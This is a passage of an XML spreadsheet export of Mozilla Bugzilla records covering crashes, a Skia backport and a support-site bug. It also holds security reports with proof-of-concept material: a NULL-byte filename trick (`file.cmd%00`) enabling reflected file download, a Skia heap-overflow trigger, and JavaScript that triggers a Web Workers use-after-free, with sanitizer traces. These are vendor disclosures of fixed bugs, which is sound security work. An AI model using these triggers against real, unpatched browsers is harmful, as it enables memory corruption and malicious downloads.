  0x0c1a8009a3b0: fd fd fd fd fd fd fd fd fd fd fd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0914==ABORTING</t>
        </is>
      </c>
      <c r="X217" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="218">
      <c r="A218" t="n">
        <v>1355676</v>
      </c>
      <c r="B218" t="inlineStr">
        <is>
          <t>2017-04-11 19:30:40 -0700</t>
        </is>
      </c>
      <c r="C218" t="inlineStr">
        <is>
          <t>Crash in java.lang.NullPointerException: Attempt to invoke virtual method ''android.graphics.Bitmap org.mozilla.gecko.icons.decoders.LoadFaviconResult.getBestBitmap(int)'' on a null object reference at org.mozilla.gecko.BrowserApp.handleMessage(Browser...</t>
        </is>
      </c>
      <c r="D218" t="inlineStr">
        <is>
          <t>2020-12-21 10:38:00 -0800</t>
        </is>
      </c>
      <c r="E218" t="n">
        <v>1</v>
      </c>
      <c r="F218" t="n">
        <v>1</v>
      </c>
      <c r="G218" t="n">
        <v>6</v>
      </c>
      <c r="H218" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I218" t="inlineStr">
        <is>
          <t>Firefox for Android Graveyard</t>
        </is>
      </c>
      <c r="J218" t="inlineStr">
        <is>
          <t>Web Apps (PWAs)</t>
        </is>
      </c>
      <c r="K218" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L218" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M218" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N218" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O218" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P218" t="inlineStr"/>
      <c r="Q218" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R218" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S218" t="inlineStr">
        <is>
          <t>Firefox 55</t>
        </is>
      </c>
      <c r="T218" t="n">
        <v>1</v>
      </c>
      <c r="U218" t="n">
        <v>0</v>
      </c>
      <c r="V218" t="n">
        <v>15</v>
      </c>
      <c r="W218" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is 
report bp-2568070c-7f98-404b-b13d-07f912170410.
=============================================================
Top #2 of Nightly 20170409194153 on Android, 5 crashes from 1 installation. There are 17 reports from 5 installations in the past week.</t>
        </is>
      </c>
      <c r="X218" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="219">
      <c r="A219" t="n">
        <v>1784348</v>
      </c>
      <c r="B219" t="inlineStr">
        <is>
          <t>2022-08-11 12:59:23 -0700</t>
        </is>
      </c>
      <c r="C219" t="inlineStr">
        <is>
          <t>Content-Disposition filename truncation leads to Reflected File Download</t>
        </is>
      </c>
      <c r="D219" t="inlineStr">
        <is>
          <t>2024-05-30 10:59:40 -0700</t>
        </is>
      </c>
      <c r="E219" t="n">
        <v>1</v>
      </c>
      <c r="F219" t="n">
        <v>1</v>
      </c>
      <c r="G219" t="n">
        <v>3</v>
      </c>
      <c r="H219" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I219" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J219" t="inlineStr">
        <is>
          <t>Networking: HTTP</t>
        </is>
      </c>
      <c r="K219" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L219" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M219" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N219" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O219" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P219" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][necko-triaged][necko-priority-queue][post-critsmash-triage][adv-main112+][adv-esr102.10+]</t>
        </is>
      </c>
      <c r="Q219" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R219" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S219" t="inlineStr">
        <is>
          <t>113 Branch</t>
        </is>
      </c>
      <c r="T219" t="n">
        <v>1</v>
      </c>
      <c r="U219" t="n">
        <v>0</v>
      </c>
      <c r="V219" t="n">
        <v>16</v>
      </c>
      <c r="W219" t="inlineStr">
        <is>
          <t>User-Agent:
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0
Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
When handling filename directive in the Content-Disposition header, the filename would be truncated if the token contains a NULL character and only the first part is kept: `filename.exe&lt;NULL&gt;.txt` -&gt; `filename.exe`
This behavior makes Firefox users vulnerable to reflected file download (RFD). For instance, CVE-2022-36359[1] in Django that has been patched[2] is still exploitable on Firefox because the filename truncation provides a trivial way to manipulate and bypass extension checking/appending on the server side. These RFD vulnerabilities such as CVE-2022-36359, CVE-2015-5211[3] and CVE-2020-5398[4] in Spring Frameworks are all rated as High or Important in severity by the project maintainers.
More about RFD: https://securitylab.github.com/research/rfd-spring-mvc-CVE-2020-5398/
I know the vulnerability exists partly because Django allows invalid characters (RFC 2616 I suppose) in the filename. That said, this can only be addressed reliably from the client side. I believe it would be reasonable to stop accepting responses with invalid headers.
```
from django.shortcuts import render
from django.http import FileResponse
def index(request):
    filename = request.GET.get('filename') + ".pdf"
    print(filename)
    return FileResponse(open("/test.txt", 'rb'), as_attachment=True, filename=filename)
```
Given `request.GET.get('filename') = file.cmd%00`, Firefox would download the file `file.cmd` instead of `file.cmd.pdf` while Chromium and Safari threw an error (ERR_INVALID_HTTP_RESPONSE) and refused to open the page in this case.
Response:
```
HTTP/1.1 200 OK
Date: Thu, 11 Aug 2022 19:40:57 GMT
Server: WSGIServer/0.2 CPython/3.8.10
Content-Type: application/octet-stream
Content-Length: 3213
Content-Disposition: attachment; filename="file.cmd&lt;NULL&gt;.pdf"
```
[1] https://www.djangoproject.com/weblog/2022/aug/03/security-releases/
[2] https://github.com/django/django/commit/bd062445cffd3f6cc6dcd20d13e2abed818fa173
[3] https://tanzu.vmware.com/security/cve-2015-5211
[4] https://tanzu.vmware.com/security/cve-2020-5398</t>
        </is>
      </c>
      <c r="X219" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="220">
      <c r="A220" t="n">
        <v>1454692</v>
      </c>
      <c r="B220" t="inlineStr">
        <is>
          <t>2018-04-17 08:58:07 -0700</t>
        </is>
      </c>
      <c r="C220" t="inlineStr">
        <is>
          <t>Backport relevant post-m55 Skia security fixes to ESR52</t>
        </is>
      </c>
      <c r="D220" t="inlineStr">
        <is>
          <t>2020-02-16 17:40:22 -0800</t>
        </is>
      </c>
      <c r="E220" t="n">
        <v>1</v>
      </c>
      <c r="F220" t="n">
        <v>1</v>
      </c>
      <c r="G220" t="n">
        <v>3</v>
      </c>
      <c r="H220" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I220" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J220" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K220" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L220" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M220" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N220" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O220" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P220" t="inlineStr">
        <is>
          <t>[adv-esr52.8+]</t>
        </is>
      </c>
      <c r="Q220" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R220" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S220" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T220" t="n">
        <v>1</v>
      </c>
      <c r="U220" t="n">
        <v>0</v>
      </c>
      <c r="V220" t="n">
        <v>14</v>
      </c>
      <c r="W220" t="inlineStr">
        <is>
          <t>Per discussion with Milan and Dan today, we want to cherry-pick the relevant Skia security fixes which have landed upstream since the m55 release we're shipping in ESR52 rather than trying to do a wholesale uplift of m66.
Dan is going to work on compiling a spreadsheet of the fixes in question.</t>
        </is>
      </c>
      <c r="X220" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="221">
      <c r="A221" t="n">
        <v>616284</v>
      </c>
      <c r="B221" t="inlineStr">
        <is>
          <t>2010-12-02 14:22:38 -0800</t>
        </is>
      </c>
      <c r="C221" t="inlineStr">
        <is>
          <t>Redirects should be nonlocalizable</t>
        </is>
      </c>
      <c r="D221" t="inlineStr">
        <is>
          <t>2010-12-17 00:51:31 -0800</t>
        </is>
      </c>
      <c r="E221" t="n">
        <v>1</v>
      </c>
      <c r="F221" t="n">
        <v>1</v>
      </c>
      <c r="G221" t="n">
        <v>5</v>
      </c>
      <c r="H221" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I221" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J221" t="inlineStr">
        <is>
          <t>Knowledge Base Software</t>
        </is>
      </c>
      <c r="K221" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L221" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M221" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N221" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O221" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P221" t="inlineStr"/>
      <c r="Q221" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R221" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S221" t="inlineStr">
        <is>
          <t>2.3.2</t>
        </is>
      </c>
      <c r="T221" t="n">
        <v>1</v>
      </c>
      <c r="U221" t="n">
        <v>0</v>
      </c>
      <c r="V221" t="n">
        <v>7</v>
      </c>
      <c r="W221" t="inlineStr">
        <is>
          <t>When we auto-create redirects, we should mark them as non-localizable. See this in models:
# TODO: Mark the redirect doc as unlocalizable when there is way to
# represent that.
When we made the field, we never did the TODO.</t>
        </is>
      </c>
      <c r="X221" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="222">
      <c r="A222" t="n">
        <v>1418447</v>
      </c>
      <c r="B222" t="inlineStr">
        <is>
          <t>2017-11-17 11:23:47 -0800</t>
        </is>
      </c>
      <c r="C222" t="inlineStr">
        <is>
          <t>Heap overflow write in SkEdgeBuilder::buildPoly</t>
        </is>
      </c>
      <c r="D222" t="inlineStr">
        <is>
          <t>2024-05-30 09:38:33 -0700</t>
        </is>
      </c>
      <c r="E222" t="n">
        <v>1</v>
      </c>
      <c r="F222" t="n">
        <v>1</v>
      </c>
      <c r="G222" t="n">
        <v>3</v>
      </c>
      <c r="H222" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I222" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J222" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K222" t="inlineStr">
        <is>
          <t>57 Branch</t>
        </is>
      </c>
      <c r="L222" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M222" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N222" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O222" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P222" t="inlineStr">
        <is>
          <t>[adv-main58+][adv-esr52.6+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q222" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R222" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S222" t="inlineStr">
        <is>
          <t>mozilla59</t>
        </is>
      </c>
      <c r="T222" t="n">
        <v>1</v>
      </c>
      <c r="U222" t="n">
        <v>0</v>
      </c>
      <c r="V222" t="n">
        <v>27</v>
      </c>
      <c r="W222" t="inlineStr">
        <is>
          <t>Created attachment 8929568
poc.html
User Agent: Mozilla/5.0 (X11; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0
Build ID: 20171115095126
Steps to reproduce:
System: Ubuntu 16.04.3 LTS (64bit)
Firefox version: 57.0 (64-bit)
RAM size:16376108 kB(16G) 
Root cause:
Int overflow could happen there:
https://searchfox.org/mozilla-central/source/gfx/skia/skia/src/core/SkEdgeBuilder.cpp#251
    int maxEdgeCount = path.countPoints();
    if (iclip) {
        // clipping can turn 1 line into (up to) kMaxClippedLineSegments, since
        // we turn portions that are clipped out on the left/right into vertical
        // segments.
        maxEdgeCount *= SkLineClipper::kMaxClippedLineSegments; // Int overflow
    } 
     size_t edgeSize = fAnalyticAA ? sizeof(SkAnalyticEdge) : sizeof(SkEdge);
    char* edge = fAnalyticAA ? (char*)fAlloc.makeArrayDefault&lt;SkAnalyticEdge&gt;(maxEdgeCount)
                             : (char*)fAlloc.makeArrayDefault&lt;SkEdge&gt;(maxEdgeCount);
When "maxEdgeCount" become negative,  "fAlloc.makeArrayDefault" will alloc much less memory than needed:
 makeArrayDefault(size_t count) {
        uint32_t safeCount = SkTo&lt;uint32_t&gt;(count); // incorrect conversion
Reproduce:
To trigger the vulnerability, we need to make the path have  about 0x80000000/3 points, which would consume about 6.1G RAM.
Hence the vulnerability can only be fast triggered on a computer with at least 8GB RAM.
Open attached poc.html, wait for about 30 seconds or less, the tab will crash.
With gdb attached and  firefox-dbg installed, we can see the stack backtrace:
(gdb) bt 8
#0  SkEdgeBuilder::CombineVertical (this=0x7ffd64103020, edge=0x7f1087747218, last=0x25700000000)
    at /build/firefox-HLWaua/firefox-57.0+build4/gfx/skia/skia/src/core/SkEdgeBuilder.cpp:22
#1  0x00007f10a80b24b5 in SkEdgeBuilder::buildPoly (this=this@entry=0x7ffd64103020, path=..., 
    iclip=iclip@entry=0x7ffd64102f80, shiftUp=shiftUp@entry=2, canCullToTheRight=canCullToTheRight@entry=true)
    at /build/firefox-HLWaua/firefox-57.0+build4/gfx/skia/skia/src/core/SkEdgeBuilder.cpp:284
#2  0x00007f10a80b642e in SkEdgeBuilder::build (this=this@entry=0x7ffd64103020, path=..., 
    iclip=iclip@entry=0x7ffd64102f80, shiftUp=shiftUp@entry=2, canCullToTheRight=&lt;optimized out&gt;, 
    analyticAA=analyticAA@entry=false)
    at /build/firefox-HLWaua/firefox-57.0+build4/gfx/skia/skia/src/core/SkEdgeBuilder.cpp:352
#3  0x00007f10a811d3b4 in sk_fill_path (path=..., clipRect=..., blitter=blitter@entry=0x7ffd641031b0, start_y=-150, 
    stop_y=150, shiftEdgesUp=shiftEdgesUp@entry=2, pathContainedInClip=false)
    at /build/firefox-HLWaua/firefox-57.0+build4/gfx/skia/skia/src/core/SkScan_Path.cpp:405
#4  0x00007f10a7e850a1 in SkScan::AntiFillPath (path=..., origClip=..., blitter=&lt;optimized out&gt;, 
    blitter@entry=0x7ffd64103cf8, forceRLE=forceRLE@entry=false)
    at /build/firefox-HLWaua/firefox-57.0+build4/gfx/skia/skia/src/core/SkScan_AntiPath.cpp:726
#5  0x00007f10a7e855c8 in SkScan::AntiFillPath (path=..., clip=..., blitter=0x7ffd64103cf8)
    at /build/firefox-HLWaua/firefox-57.0+build4/gfx/skia/skia/src/core/SkScan_AntiPath.cpp:783
#6  0x00007f10a801df10 in SkDraw::drawDevPath (this=this@entry=0x7ffd64104ac0, devPath=..., paint=..., 
    drawCoverage=drawCoverage@entry=false, customBlitter=customBlitter@entry=0x0, doFill=doFill@entry=true)
    at /build/firefox-HLWaua/firefox-57.0+build4/gfx/skia/skia/src/core/SkDraw.cpp:1070
#7  0x00007f10a80203c0 in SkDraw::drawPath (this=this@entry=0x7ffd64104ac0, origSrcPath=..., origPaint=..., 
    prePathMatrix=prePathMatrix@entry=0x0, pathIsMutable=&lt;optimized out&gt;, pathIsMutable@entry=false, 
    drawCoverage=drawCoverage@entry=false, customBlitter=0x0)
    at /build/firefox-HLWaua/firefox-57.0+build4/gfx/skia/skia/src/core/SkDraw.cpp:1163
In function "SkEdgeBuilder::Combine SkEdgeBuilder::CombineVertical(const SkEdge* edge, SkEdge* last) ", "last" points to invalid memory.(First be read and then be written)</t>
        </is>
      </c>
      <c r="X222" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="223">
      <c r="A223" t="n">
        <v>1546331</v>
      </c>
      <c r="B223" t="inlineStr">
        <is>
          <t>2019-04-23 04:01:45 -0700</t>
        </is>
      </c>
      <c r="C223" t="inlineStr">
        <is>
          <t>Web Workers - Use After Free in RegisterDebuggerMainThread()</t>
        </is>
      </c>
      <c r="D223" t="inlineStr">
        <is>
          <t>2024-05-30 09:58:47 -0700</t>
        </is>
      </c>
      <c r="E223" t="n">
        <v>1</v>
      </c>
      <c r="F223" t="n">
        <v>1</v>
      </c>
      <c r="G223" t="n">
        <v>3</v>
      </c>
      <c r="H223" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I223" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J223" t="inlineStr">
        <is>
          <t>DOM: Workers</t>
        </is>
      </c>
      <c r="K223" t="inlineStr">
        <is>
          <t>68 Branch</t>
        </is>
      </c>
      <c r="L223" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M223" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N223" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O223" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P223" t="inlineStr">
        <is>
          <t>[adv-main71+][adv-esr68.3+]</t>
        </is>
      </c>
      <c r="Q223" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R223" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S223" t="inlineStr">
        <is>
          <t>mozilla72</t>
        </is>
      </c>
      <c r="T223" t="n">
        <v>1</v>
      </c>
      <c r="U223" t="n">
        <v>0</v>
      </c>
      <c r="V223" t="n">
        <v>43</v>
      </c>
      <c r="W223" t="inlineStr">
        <is>
          <t>Created attachment 9060048
UAF_RegisterDebuggerMainThread_PoC.js
Prove of Concept test case (full server code in attached file UAF_RegisterDebuggerMainThread_PoC.js):
	Main Page code:
        &lt;script type="text/javascript"&gt;
        gc = function() 
        {
          for (var i = 0; i &lt; 0x20000; ++i)
            var s = new String('AAAA');
        };
        worker0 = new Worker("worker0.js");
        worker0.onerror=function(){ gc();};
        worker1 = new Worker("worker1.js");
        setTimeout(function(){location.reload()},200);
        &lt;/script&gt;
	Worker 0:
		var embedworker1 = new Worker("embedworker1.js"); yes = no;
	Worker 1:
        self.onerror = function () { 
        embedworker0.terminate();
        };
        var embedworker0 = new Worker("embedworker0.js"); yes = no;
Steps to reproduce: 
	1. Run server side script UAF_RegisterDebuggerMainThread_PoC.js with Node.js (node UAF_RegisterDebuggerMainThread_PoC.js).
	2. Enter http://localhost:12345 in Firefox ASAN build.
	3. ASAN reports a Use After Free in RegisterDebuggerMainThread():
        ==3247==ERROR: AddressSanitizer: heap-use-after-free on address 0x61b00017b210 at pc 0x7fe791ea90ce bp 0x7ffe59b72f10 sp 0x7ffe59b72f08
        WRITE of size 8 at 0x61b00017b210 thread T0 (Web Content)
            #0 0x7fe791ea90cd in SetDebugger /builds/worker/workspace/build/src/dom/workers/WorkerPrivate.h:188:15
            #1 0x7fe791ea90cd in mozilla::dom::WorkerDebuggerManager::RegisterDebuggerMainThread(mozilla::dom::WorkerPrivate*, bool) 
Firefox version: 68.0a1 (2019-04-22) (64-bit)
OS: Ubuntu 16.04 LTS
Stack trace:
    =================================================================
    ==3247==ERROR: AddressSanitizer: heap-use-after-free on address 0x61b00017b210 at pc 0x7fe791ea90ce bp 0x7ffe59b72f10 sp 0x7ffe59b72f08
    WRITE of size 8 at 0x61b00017b210 thread T0 (Web Content)
        #0 0x7fe791ea90cd in SetDebugger /builds/worker/workspace/build/src/dom/workers/WorkerPrivate.h:188:15
        #1 0x7fe791ea90cd in mozilla::dom::WorkerDebuggerManager::RegisterDebuggerMainThread(mozilla::dom::WorkerPrivate*, bool) /builds/worker/workspace/build/src/dom/workers/WorkerDebuggerManager.cpp:277
        #2 0x7fe791ed28de in mozilla::dom::(anonymous namespace)::RegisterDebuggerMainThreadRunnable::Run() /builds/worker/workspace/build/src/dom/workers/WorkerDebuggerManager.cpp:41:14
        #3 0x7fe78a2b22c1 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1180:14
        #4 0x7fe78a2b83d8 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:486:10
        #5 0x7fe78b2f7caa in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:88:21
        #6 0x7fe78b227fd2 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
        #7 0x7fe78b227fd2 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308
        #8 0x7fe78b227fd2 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290
        #9 0x7fe7926bf749 in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:137:27
        #10 0x7fe7962dd4df in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:919:20
        #11 0x7fe78b227fd2 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
        #12 0x7fe78b227fd2 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308
        #13 0x7fe78b227fd2 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290
        #14 0x7fe7962dce86 in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:757:34
        #15 0x5604aa4e53a7 in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:56:28
        #16 0x5604aa4e53a7 in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:263
        #17 0x7fe7a9c4282f in __libc_start_main /build/glibc-Cl5G7W/glibc-2.23/csu/../csu/libc-start.c:291
        #18 0x5604aa406af8 in _start (/home/thecoder/FirefoxBuilds/firefox/firefox+0x2aaf8)
    0x61b00017b210 is located 912 bytes inside of 1440-byte region [0x61b00017ae80,0x61b00017b420)
    freed by thread T22 (DOM Worker) here:
        #0 0x5604aa4b2182 in free /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:124:3
        #1 0x7fe791f1e110 in operator delete /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:151:10
        #2 0x7fe791f1e110 in Release /builds/worker/workspace/build/src/dom/workers/WorkerPrivate.h:102
        #3 0x7fe791f1e110 in Release /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:46
        #4 0x7fe791f1e110 in Release /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:363
        #5 0x7fe791f1e110 in assign_assuming_AddRef /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:65
        #6 0x7fe791f1e110 in operator= /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:156
        #7 0x7fe791f1e110 in ClearSelfAndParentEventTargetRef /builds/worker/workspace/build/src/dom/workers/WorkerPrivate.h:125
        #8 0x7fe791f1e110 in mozilla::dom::(anonymous namespace)::WorkerFinishedRunnable::WorkerRun(JSContext*, mozilla::dom::WorkerPrivate*) /builds/worker/workspace/build/src/dom/workers/WorkerPrivate.cpp:238
        #9 0x7fe791f09842 in mozilla::dom::WorkerRunnable::Run() /builds/worker/workspace/build/src/dom/workers/WorkerRunnable.cpp:363:12
        #10 0x7fe791eef44c in ProcessAllControlRunnablesLocked /builds/worker/workspace/build/src/dom/workers/WorkerPrivate.cpp:3276:9
        #11 0x7fe791eef44c in mozilla::dom::WorkerPrivate::DoRunLoop(JSContext*) /builds/worker/workspace/build/src/dom/workers/WorkerPrivate.cpp:2646
        #12 0x7fe791eb82cb in mozilla::dom::workerinternals::(anonymous namespace)::WorkerThreadPrimaryRunnable::Run() /builds/worker/workspace/build/src/dom/workers/RuntimeService.cpp:2305:40
        #13 0x7fe78a2b22c1 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1180:14
        #14 0x7fe78a2b83d8 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:486:10
        #15 0x7fe78b2f8eb0 in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:333:5
        #16 0x7fe78b227fd2 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
        #17 0x7fe78b227fd2 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308
        #18 0x7fe78b227fd2 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290
        #19 0x7fe78a2ac21a in nsThread::ThreadFunc(void*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:454:11
        #20 0x7fe7ab05905d in _pt_root /builds/worker/workspace/build/src/nsprpub/pr/src/pthreads/ptthread.c:201:5
        #21 0x7fe7aaca06b9 in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x76b9)
    previously allocated by thread T22 (DOM Worker) here:
        #0 0x5604aa4b2503 in __interceptor_malloc /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:146:3
        #1 0x5604aa4e6f9d in moz_xmalloc /builds/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:68:15
        #2 0x7fe791ee9c29 in operator new /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:131:10
        #3 0x7fe791ee9c29 in mozilla::dom::WorkerPrivate::Constructor(JSContext*, nsTSubstring&lt;char16_t&gt; const&amp;, bool, mozilla::dom::WorkerType, nsTSubstring&lt;char16_t&gt; const&amp;, nsTSubstring&lt;char&gt; const&amp;, mozilla::dom::WorkerLoadInfo*, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/dom/workers/WorkerPrivate.cpp:2235
        #4 0x7fe791e9ba17 in mozilla::dom::Worker::Constructor(mozilla::dom::GlobalObject const&amp;, nsTSubstring&lt;char16_t&gt; const&amp;, mozilla::dom::WorkerOptions const&amp;, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/dom/workers/Worker.cpp:30:41
        #5 0x7fe78f4ae630 in mozilla::dom::Worker_Binding::_constructor(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/WorkerBinding.cpp:1112:52
        #6 0x7fe796569595 in CallJSNative /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:442:13
        #7 0x7fe796569595 in CallJSNativeConstructor /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:458
        #8 0x7fe796569595 in InternalConstruct(JSContext*, js::AnyConstructArgs const&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:651
        #9 0x7fe796546916 in Interpret(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3070:16
        #10 0x7fe796530528 in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:422:10
        #11 0x7fe79656bb7c in js::ExecuteKernel(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value const&amp;, js::AbstractFramePtr, JS::Value*) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:781:13
        #12 0x7fe79656c329 in js::Execute(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value*) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:814:10
        #13 0x7fe7967ed334 in bool Evaluate&lt;char16_t&gt;(JSContext*, js::ScopeKind, JS::Handle&lt;JSObject*&gt;, JS::ReadOnlyCompileOptions const&amp;, JS::SourceText&lt;char16_t&gt;&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/vm/CompilationAndEvaluation.cpp:539:10
        #14 0x7fe7967ec6aa in JS::Evaluate(JSContext*, JS::ReadOnlyCompileOptions const&amp;, JS::SourceText&lt;char16_t&gt;&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/vm/CompilationAndEvaluation.cpp:557:10
